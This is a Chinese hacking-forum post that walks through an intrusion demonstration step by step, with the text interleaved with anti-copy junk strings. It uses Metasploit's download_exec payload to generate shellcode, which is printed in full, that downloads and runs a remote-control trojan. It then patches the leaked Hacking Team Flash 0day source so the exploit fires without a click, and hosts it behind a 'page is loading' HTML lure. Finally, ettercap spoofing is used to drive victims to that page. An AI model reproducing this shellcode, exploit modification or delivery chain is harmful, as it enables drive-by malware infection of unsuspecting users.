中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

; X4 j, R0 k7 V+ p 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 k+ B0 u7 T% i* M) E

" i) j+ Y9 Z$ s2 y& P0 c2 I/ Q/ [

& s4 D/ W* q9 `& J9 g0 a# F' F2 @! N 利用到的工具: . p5 J% K. N+ g# `( s

1 t1 H! P: ]6 q3 K& I6 T" u( Y( Q/ h3 @

! A. ^. }6 j Z o: N; Q Msf " \4 N( o2 Z& D% k# F3 I

0 ?" c; ^ }2 w; ^' t% e* w6 z7 P

' }4 m+ B2 I! A( C( N! _; y Ettercap : R* p$ y2 `' ~7 i$ s

1 ?9 O5 ~/ E: m4 ?8 ^

0 w2 U5 ]; x( W4 z9 r+ g9 z Adobe Flash CS6 ; | T1 S& X! \3 Y( C

1 ?$ n, ^/ o4 P% V" P

" B0 b/ }/ |3 ^( S, s Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! T7 Y3 }+ W2 b2 b* N; {6 }' W* L

& T# b" I7 ?( j1 r0 I5 Q

, ]7 n: Z& S) m0 m. X 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options " u/ r4 A0 W( v

- @& U- S( d4 u; _% T. W

0 U) a. K/ V% [2 l/ q+ C 如图: # p" j. y7 f* a1 E& g0 D

' |' q) [( l+ v

! V0 G& r$ g6 F   $ }& l3 u* J0 f7 l

2 w8 C4 M( M- Y% r6 g+ X

* C* r$ X4 C. ^& j# K7 }. T# u   8 g9 J: H% O; ~1 i3 h2 t7 t

: W. o- T4 p S& W4 \" s# Q

0 d' E" c) F! f- W0 V+ z: M 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + K+ ~/ u; D9 \- S" T

* G7 U. ?/ M. @6 \

# I% @& d' [4 q4 j ^+ p   , ^0 d/ H! P( C+ ~

1 S. e* f$ `# P& R

2 d5 ?8 q: u( s   , O$ i! u& i4 K, n `( v, S! [

) ~; S" s: _ `5 v, |

. f: v1 z' u; T( V3 L9 W- S 然后执行generate -t dword生成shellcode,如下: 7 z6 n' j- n7 e1 A" s* J

' w; F0 n4 h1 ~ M( F' E( L

! H' v) X6 T. t7 ?+ R   2 ]- {- h V% R R6 E) [

]2 @5 }6 `, C7 @% g

4 X, P9 z- F" k0 v5 ?' T$ @ 复制代码到文本下便于我们一会编辑flash exp,如下: % q1 M: p) I& F$ F( I

* C3 N6 [* F7 T5 J* v. r- V0 E

2 s8 J1 b0 H8 J. X 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 x; l0 }# H2 F2 p9 t& b$ ?$ @; k1 u

& `- {9 G) U( F4 B1 a

% S0 a% F+ f" m* Y6 } 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 8 M- ` l7 s( `' M9 g

, v4 a( h* d2 } K8 t2 j6 J

7 l$ C( D1 P" {* G/ e5 L 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, # r9 G9 g# D) F, Y8 a& f4 C

( Y* X( C7 t2 D: E( D

- B T8 \+ R# A2 U* { 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, / Q7 q2 x/ _0 J b

# [0 b3 ]0 p; I( d# l

6 H! s Z4 m* R5 R 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 8 i0 _2 M F. |

' O3 f9 C/ Q' a& Q3 J+ f! |

8 X' m: T; H3 P 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / S' F, l9 t9 c4 \6 \/ O" v# G

4 H7 V. q9 \" \" H$ ~& S; x

9 O. O7 [6 F }6 }8 j 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ) Z3 z' X: _6 q- o9 G$ e$ x! _

% o. ]# l& I7 I! H* l1 s. z

/ F& Y& R1 m% G! d 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " x+ X4 o* n$ Y1 k1 H1 {

4 j, Q4 l8 p2 b6 k0 r

# [5 q5 x: E) g0 V 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 3 C7 S6 X; O3 X8 z# Q

$ ~( `+ D7 h3 k& K

+ L; J. p' J( v! `" B: v5 o( e; X 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / P/ B3 F! O* j/ r0 w. {; A8 H

' Y/ i8 E* s& X: X- s

; _0 U1 @* {. t# ] I$ E 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - [" Q4 t" k' b. g x- Z

/ J% M+ N& Z- b; w, i* o' t' i8 ]

/ P N0 l8 H1 ^' |1 P% o 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, k! G+ I- p1 @- m" ^" ]3 s1 K/ X

; Q+ Q7 k5 b2 h1 q

, ~8 n% _" j1 Z9 @4 j7 V 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, # h4 q2 ^9 W: u ]. Y, ?$ a

3 I$ O8 ?) `+ H

~9 z# E# }* V' L+ Y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : A% C$ \0 F( F- F1 Y

! p+ H, q8 ^! r

& t8 X- M* T) t, d* a3 B   4 q* @ i [4 t- a0 ~9 H" y

& [9 |3 {) d# l- w. b2 F) }( V

( b- J0 w; z& e2 `   - v8 F" E! v; B1 r

' m, b, h) q4 s

, z' j* I' k& | 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ! ^1 t5 S) M' ~) j8 x

6 v; q& |- Y2 a! T7 n

( q& y) X9 k$ w. p/ q. @% |   * R* g/ i/ r5 J* [+ p

! m" u& e: Z4 U; k. ?

( r/ J8 j0 N- ?. B: T; J 先修改ShellWin32.as,部分源代码如图: # V$ |: A$ w' c2 r0 B

8 E& f6 @0 f4 Z2 Y2 L( W

7 `2 _) }- v' H; }& [3 m6 r   % Z+ z1 P* \( P% L

' I9 E( S" @: o& X

6 a+ c& A, V% j [: g! I3 }8 b0 q 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 8 g4 i- N! W1 Q& o4 M! y# G

% n, _. m6 D1 E' H/ q

) |! n/ M4 f, w: [" M+ n   0 Y+ H% I* z- O: _' K

) x+ }4 p- c$ M0 l( g3 o/ k

_. T5 s( N V) P 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ; M+ v+ I0 U' z [3 s* r

- x0 h h$ r; \* S; T+ j

' p0 g) C( w( M: j* g5 @   7 W! m' z! c: Q3 G. G) f

' `% V$ i; m. W ?. T6 }

9 s4 P y1 [% G 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: % K& @* }/ \* h3 {/ n$ e

5 k w1 h4 v5 P, o' r/ M1 _. t

+ _' z- j# G+ @3 N. W   ! W$ [6 k0 _, E7 j1 l* b$ G0 u

$ E3 C7 c/ N0 f& Z

3 V) {1 ]9 Y8 ~4 G) e9 ]- Q: F   4 S+ ]! q( Z$ ]% g7 R) z) N

' ?8 Z1 \' P6 d# J3 {9 D% D

g/ m$ O. d# Y/ r9 g0 o   ! o3 k: Z/ ~5 o

6 w5 B( `0 |% d6 }, h

0 `% A' n; k3 m2 e& W6 ~6 B 然后点保存,下面我们来编译一下,打开 ' N& N' P5 Y3 f: ] Y

' M9 \( T, G2 x& j, Q+ g

+ ~( b. N$ X! N1 s! V" O' c exp1.fla然后点文件-发布,看看编译没错误 2 s0 G$ k" X9 i2 @" `+ ^

$ U% G( I! h2 ~9 F4 f# `2 J

8 Y. B M! @% X: J, A! J' \2 [5 E9 z   3 L( c2 P! [8 m

3 G! I7 j& Q% `+ X- k0 w" _7 ?

. y# `3 d7 P# S   : e4 g0 Y) w7 y7 _9 N4 [

) ~) Z+ \1 a Q, y/ l8 `' L

' ]. o5 w/ D* f: l   ) |, r! }2 u5 P7 x

/ c, l K7 }/ q( O" d2 M

9 I- @1 m: C+ v$ G   : s; i; Y0 Q9 W4 F: \

8 K: O' ~. [* z( N1 z- Y

$ L5 `& y& l$ w- Q6 s6 e$ Q# o/ R 然后我们把生成的 " e0 }1 Q( p, ^

+ k% N$ _* V" j6 v

1 ?( t# E/ Y4 L6 W. {& }& C4 z exp1.swf丢到kailinux /var/www/html下: 8 a0 M9 i. i1 E0 P

9 {9 {1 _) H, c6 d! t- m

# ]2 x7 k% d0 z+ Z! T3 u8 A 然后把这段代码好好编辑一下 7 D% e& ~+ l. a, l7 n/ ^% k

5 n, I# @" p* v5 X1 d0 B

% R4 i' u" s: I$ {( {% Z0 \& d6 R   7 d8 Y/ N( Q! F. x* {

) ?' x: t8 u+ f

. u, _- t) {2 D4 U: z) @* Q   3 l' i2 C3 j b: Z, ` t

& Y) G& J- e, X' R1 h4 w* y) Z

9 o9 j' @7 G- z5 F4 Z, H o, _   . @* Q* U1 w/ l& K/ F$ u

9 Z! G1 W2 X. }( {" j6 W$ k

& ^' [- Q4 T9 t+ m$ Z4 \9 {   / H/ r+ y9 w# {5 _( ~% A$ P2 e

! O4 I7 f. t s3 \ C

: U9 z- c8 D, p4 g4 S# R. |5 g   8 U. S% w+ V8 J0 E9 ]

6 R! ^- Y2 ?% ]

) r9 W0 Y1 u" Y+ e   1 {0 B) P0 d' N4 M9 U

6 g s0 A; X, A9 O9 @. h6 c# C

- ^& L8 g; P: C( A) H <!DOCTYPE html> " | d$ T; Y Y1 E; o

( J# Q) I9 A; ?0 `7 M X- K. m2 g! S

4 v K( C/ S6 H <html> 6 F: b" U+ E# o& b5 |

& o+ I/ J Z/ w8 |

7 O0 x) j9 l- u <head> 1 u7 ?6 N3 \0 _& D% K& p* \

5 c6 p# |' y) ~" S" A; ~0 f7 g

3 N3 t$ a, V0 h9 ^$ ^ <meta http-equiv="Content-Type" content="text/html; ! w3 G1 u# |6 q5 t6 U

: |# l/ U' i1 U

. V c- [8 T3 r( e8 Y charset=utf-8"/> 0 F, t9 u# W9 ]& O4 N; z/ E

& v! O) T4 L; Y7 ?8 Q

% l; N" b/ @; L% D# \ </head> 2 z: X" R6 j7 l) U7 u) {! `

- w. ]! V+ P' A6 T6 w8 f

K' k) K+ M( A: n* V( U1 ^ <body> - N4 r. H8 V8 P- s8 _5 j

0 b, M* y6 P6 {/ `/ i$ [7 J

* Y3 Q3 _, e. b <h2> Please wait, the requested page is loading...</h2> 9 T2 W# K0 K. ^- l- R! d

6 B0 P7 G2 F7 }9 m4 V

3 a" W/ M7 }/ |0 n& K' k4 @# g) L <br> j; H, `9 g) u7 {# ^

) W0 q) V" n2 y2 Q$ a

& q+ X# Y8 t7 F <OBJECT 3 ?* O! C9 w/ n6 c$ h; }

* k- u7 o; [2 y

/ u+ m* _" R7 l7 ^" V0 h* U classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ! W# ~" t# J" m8 g$ c$ c1 Q$ V# a% d

7 s- R2 } k1 `" A0 S! P

' f8 v. C7 w. W8 M) D VALUE="http://192.168.0.109/exp1.swf"></OBJECT> & u; P+ i1 F, A' `

: r1 y! b! h' W7 b$ C+ h

) t3 y" k; O/ z9 Q </body> + o0 C* j9 l( J d' t- m( C

; W( p7 z6 ~) v# W; ?4 t( J

+ t* I/ P8 T& n, [1 h& P6 c) ~ <script> . K X; d' L& W, q" i% s* A

8 ?! | G7 ^: t- v

" y% Y+ T6 [2 S0 B! }* _. f     setTimeout(function () { ( X, m ~" F" I$ B

0 p( w+ G9 i7 F

) \7 ]: ^ }4 ]& L" j          $ ]+ @2 i! D$ Q6 Y# h1 z( R' ^

7 }3 M' C5 M6 Q( H/ g. S4 M

- u" E Z0 d) T, K. F' f window.location.reload(); & c2 R" l6 j \/ `

$ f/ m9 [6 N7 r

, L6 `; F, ^1 `. t     }, 10000); ( @- @+ i5 }* Y5 c8 B7 M

% t: P: T$ M& v( p e J5 P& `

' }+ y, C( q3 K+ x   2 a8 w- K- V! @

+ t, h {& Z3 @$ V

% s$ R( D, w+ I3 E% y8 E3 p. s </script> - J5 j! w$ i& S, Z R% M

# E* } j* j4 o; C! i' j

2 y* b, O: U; w; H h </html> x' z+ c" m- a' y }' e

5 n0 K* [* {3 V8 ]* }

8 ?7 b) a6 K" `1 a& X: s- s   + x c- y/ `* o6 ]

4 T; x7 E# v# T( S$ r

. t; q0 c! H0 a" ?1 M 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ! b) x8 o: T4 ?+ z- R& J

7 y; r7 q. f o. p2 e8 ^, b

# C; o3 G% Q7 C' U( }   8 D1 D" f8 N4 {3 R. |7 p+ ?! R

: q9 c5 w V; n

6 K* N0 r8 a5 z' `# {   9 b% Q5 C& e0 X$ \) y1 x2 {

$ E: P* O5 N" h/ N

& S% W3 T+ g3 m; G$ `1 I   $ u# P% u8 g( p. z1 v

! I3 M* E* T/ R0 [* ~' `% o) k

1 Q; }) c* t% k   / J: `) r; A/ U; c* v/ V" _$ I

4 G% q% e$ j# ]5 O- j8 [4 U

2 }" K! U3 c& L/ a7 B# j6 x1 d1 t   4 b) V9 a) ]: [/ c" N

3 l1 }9 Q* D# L- P' U2 A( t

# q" F' \/ C$ s# i 下面我们用ettercap欺骗如图: % d, o8 E2 _* B& ~) Z& C& K' o

; `* t0 z1 z2 X* m; N

$ d' |! K( H3 e$ W5 l) a( s   7 g1 b2 B# @0 X

/ N& n! N3 G. s% Z2 M l3 g# ?: _

/ r5 G+ H8 P! m6 Y+ }   . f5 a' `1 T$ W+ v

% M! `0 O* O8 A# Q4 Y; C; e

" R8 ]" A/ t* f. A" g' e9 j; }- b 下面我们随便访问个网站看看: - u9 Y( `/ X) O8 K' [) e* T8 {

6 Q! i! Z, U. [: W

: W' v8 H. `9 Y) p1 l1 p( Y 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) L- D: L6 j. F$ j

: H7 U6 v: U/ s9 d8 K

3 E. [4 c# ?; G( o   5 p% Y5 j0 E$ {0 G

$ F$ I* @- l$ P+ G

1 u$ v+ Y5 i, h; I, A" z 我们看另一台, - |* p; q$ i' g

# E) t* _1 N0 J: T. W+ w" ?

/ E! W& `& m4 `; U& o6 A 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 7 Q: T) |# Q/ h: ~* [* ]) B- Z






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2